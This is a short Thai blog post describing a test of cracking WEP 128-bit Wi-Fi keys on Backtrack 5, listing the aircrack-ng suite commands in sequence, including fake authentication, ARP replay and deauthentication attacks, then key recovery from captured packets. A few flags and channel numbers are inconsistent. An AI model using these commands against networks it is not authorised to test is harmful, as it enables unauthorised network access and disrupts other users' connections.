กรณีศึกษา ทดลองเจาะ WEP 128 bit บน Backtrack 5 (Hack WEP on Backtrack5)

     ผมเจอวิดีโอการทดสอบการเจาะ WEP บน Backtrack 5 ซึ่งทดลองแล้วก็ได้ผลในเวลาไม่เกิน 15 นาที(ในวิดีโอบอกแค่ 2 นาที)


คำสั่งที่ใช้ในการทดลอง
-airmon-ng
(แสดง Interface ที่มีอยู่)


-airmon-ng start wlan0
(เปิด wlan0 ให้อยู่ในโหมด monitor )


-airodump-ng mon0
(แสกน access point และ client)


-airodump-ng --channell 1 -bssid  XX:XX:XX:XX -w dnsandavideos mon0
(บันทึก Packet  ที่ capturing ได้ จาก channel 11 และ ssid XX:XX:XX:XX ชื่อ dnsandavideos จาก mon0)


-aireplay-ng -1 0 -a XX:XX:XX:XX mon0
(Attack 1: Fake authentication)


-aireplay-ng -3 -b XX:XX:XX:XX mon0
(Attack 3: ARP request replay attack)


-aireplay-ng -0 0 -a XX:XX:XX:XX mon0(Special Attack)
(Attack 0: Deauthentication)


-aircrack-ng dnsandavideos*.cap
(หา Key จากไฟล์ที่ capture ไว้ )


ดูวิดีโอด้านล่างประกอบได้เลยครับ



++คำอธิบายถ้าผิดยังไง ผู้รู้รบกวนบอกด้วยครับ++

เอกสารเพิ่มเติม >>>>  http://www.aircrack-ng.org/

Share on Google Plus

About Volk-69

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment

0 comments:

Post a Comment